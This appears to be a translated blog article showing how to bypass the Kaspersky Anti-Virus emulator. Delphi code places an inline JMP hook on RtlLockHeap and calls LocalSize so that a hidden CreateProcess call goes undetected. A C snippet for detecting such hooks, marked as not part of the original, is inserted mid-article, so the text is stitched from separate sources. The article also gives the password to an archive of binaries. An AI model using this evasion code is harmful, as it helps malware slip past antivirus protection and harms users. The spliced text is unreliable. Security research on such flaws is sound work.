10:50 Vulnerability in the Kaspersky Anti-Virus emulator
Today's world is full of an ever-growing number of viruses, more than can be caught one by one. That is why modern "cloud network" technology and heuristic code analyzers exist: to protect against completely new threats before analysts add samples to the antivirus databases. It is no secret that every system has a couple of holes that sooner or later come to light. Sometimes that is due to programmer error, and sometimes to advances in virus-writing technology. In this article I will show one way to bypass the emulator in the latest versions of Kaspersky Anti-Virus.

Theory

What is an emulator in an antivirus, and what is it for? The answer is simple. Almost all malware is encrypted and packed with various cryptors and protectors, so when a file on disk is scanned, the emulator "spins" the executable under test in its virtual machine and gradually works its way down to the real code, where detection then happens either by signature or heuristically.

While developing one of my programs I ran into Kaspersky Anti-Virus constantly flagging my executable as "HEUR:Trojan.Win32.Generic", although I saw nothing malicious in it. By process of elimination I found that the antivirus objects to the process-creation function CreateProcess(...) when its parameters include a flag for a hidden start of the process. There was no way around that call, so I had to try different variants of the code, which was interesting in its own right. The result did not take long: within a couple of hours three ways of countering the emulator were found. Let us consider the one I find most interesting, a vulnerability in how API functions are checked. The emulator checks only the Win API calls made directly by the application under test; whether it also examines the other APIs that a checked API calls in turn is another matter, and as it turned out, it does not.
Whether this was done for optimization or is simply a developer oversight, nobody knows. To make it a little clearer, here is a small diagram: the left side shows the program's execution in a real environment, and the right side shows how the code is checked in the antivirus's emulated environment.

Practice

Here is an example of the code that was detected in my program. As mentioned, the code does nothing wrong; it merely starts a process in a suspended state. Written in Delphi.

    program BadCode;

    uses
      Windows;

    procedure ProcessBadCode();
    var
      StartInfo: TStartupInfoA;
      ProcInfo: TProcessInformation;
    begin
      ZeroMemory(@StartInfo, SizeOf(TStartupInfoA));
      StartInfo.cb := SizeOf(TStartupInfoA);
      CreateProcessA(nil, 'svchost.exe', nil, nil, False, CREATE_SUSPENDED,
                     nil, nil, StartInfo, ProcInfo);
    end;

    begin
      ProcessBadCode();
    end.

All it takes to run code unnoticed under the emulator's nose is to set a hook on some API that transfers execution to the code which is supposed to go unnoticed, and then find another API that calls the first one and call that second API from your own code. In the example below I took the functions RtlLockHeap(...) from ntdll.dll and LocalSize(...) from kernel32.dll; as many have already guessed, the second calls the first. After the hook is placed on RtlLockHeap(...), the call chain looks like this: MyCode(...) -> LocalSize(...) -> RtlLockHeap(...) -> BadCode(...). The antivirus produces no detection.
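A defender-side counterpart to the hook described above, added here as an example that is not part of the original article: an integrity check that inspects the first bytes of a function's entry point and reports whether they have been overwritten with a 5-byte near JMP (the $E9 plus rel32 pattern the hook writes) and whether the jump leaves the owning module. The module base, function address and byte strings are constructed sample values, not real ntdll layouts.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Result of inspecting a function's entry bytes for an inline JMP hook. */
typedef struct {
    bool hooked;            /* entry starts with E9 rel32 (5-byte near jmp) */
    uint32_t target;        /* absolute 32-bit target of that jmp */
    bool target_in_module;  /* false when the jmp leaves the owning module */
} hook_check_t;

/* rel32 is relative to the end of the 5-byte instruction, so this is the
 * inverse of the arithmetic an inline hook uses: target = from + 5 + rel. */
hook_check_t check_entry(const uint8_t *bytes, size_t len, uint32_t func_addr,
                         uint32_t module_base, uint32_t module_size)
{
    hook_check_t r = {false, 0, true};
    if (len < 5 || bytes[0] != 0xE9)
        return r;
    uint32_t rel = (uint32_t)bytes[1] | ((uint32_t)bytes[2] << 8) |
                   ((uint32_t)bytes[3] << 16) | ((uint32_t)bytes[4] << 24);
    r.hooked = true;
    r.target = func_addr + 5u + rel;                 /* wraps mod 2^32 like the CPU */
    r.target_in_module = (r.target - module_base) < module_size;
    return r;
}

/* Constructed sample (placeholder addresses, not a real ntdll layout):
 * a clean prologue (mov edi,edi; push ebp; mov ebp,esp) versus the same
 * entry after a hook that redirects it to 0x00401000 inside the caller. */
#define NTDLL_BASE  0x77F00000u
#define NTDLL_SIZE  0x00100000u
#define FUNC_ADDR   0x77F1A000u

static const uint8_t clean_entry[]  = {0x8B, 0xFF, 0x55, 0x8B, 0xEC};
static const uint8_t hooked_entry[] = {0xE9, 0xFB, 0x6F, 0x4E, 0x88};

hook_check_t check_clean(void)  { return check_entry(clean_entry,  5, FUNC_ADDR, NTDLL_BASE, NTDLL_SIZE); }
hook_check_t check_hooked(void) { return check_entry(hooked_entry, 5, FUNC_ADDR, NTDLL_BASE, NTDLL_SIZE); }

int main(void)
{
    hook_check_t h = check_hooked();
    printf("hooked=%d target=0x%08X in_module=%d\n", h.hooked, h.target, h.target_in_module);
    return 0;
}
```

A scanner or emulator that compares each exported entry against the on-disk image in this way sees the redirected RtlLockHeap(...) before LocalSize(...) ever reaches it.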
    program HookedBadCode;

    uses
      Windows;

    var
      Initialized: Boolean;

    procedure ProcessBadCode();
    var
      StartInfo: TStartupInfoA;
      ProcInfo: TProcessInformation;
    begin
      if not Initialized then  // our code must run only once, but the hooked API may be called many times
      begin
        Initialized := True;   // so a variable controls that
        ZeroMemory(@StartInfo, SizeOf(TStartupInfoA));
        StartInfo.cb := SizeOf(TStartupInfoA);
        CreateProcessA(nil, 'svchost.exe', nil, nil, False, CREATE_SUSPENDED,
                       nil, nil, StartInfo, ProcInfo);
        Sleep(5000);                           // wait, then finish the started process
        TerminateProcess(ProcInfo.hProcess, 0);
        ExitProcess(0);                        // finish the current process
      end;
      Sleep(INFINITE);  // all further calls of the hooked API are paused here
    end;

    procedure ProcessStartCode();
      procedure WriteJmp(AddressFrom, AddressTo: Integer);  // writes a jmp to the required code
      var
        Protect, Stuff: Cardinal;
      begin
        VirtualProtect(Ptr(AddressFrom), 5, PAGE_EXECUTE_READWRITE, Protect);
        PByte(AddressFrom)^ := $E9;
        PInteger(AddressFrom + 1)^ := AddressTo - AddressFrom - 5;
        VirtualProtect(Ptr(AddressFrom), 5, Protect, Stuff);
      end;
    var
      NativeFunc: procedure();
    begin
      // find the address of the first function
      @NativeFunc := GetProcAddress(GetModuleHandle('ntdll.dll'), 'RtlLockHeap');
      // put a hook on it that transfers program execution to BadCode
      WriteJmp(Integer(@NativeFunc), Integer(@ProcessBadCode));
      // call the second function, which in turn calls the first one...
      LocalSize(0);
    end;

    begin
      ProcessStartCode();
    end.

Conclusions

The golden rule: "Trust, but verify!" Unfortunately, the existing policy of "trusting" signed programs has already failed: examples of this were implemented both in the Stuxnet virus and in the recent Adobe exploitation. As my small experiment shows, the heuristic code of one of the most popular antivirus products is subject to the same issues. It is particularly notable that Kaspersky's heuristics were one of only two to notice a threat in this file (honor and praise to it for that), while the Chinese detector Jiangmin was clearly a false alarm.
I only wish everything were decided that simply... All this once again confirms the indisputable truth that no product provides adequate protection unless its operator understands the basics of security and is proactive about combating threats. Also attached is an archive of the compiled binaries and source code discussed in the article. The archive password is elcrabe. I would like to thank gjf (nick) for help in preparing this article.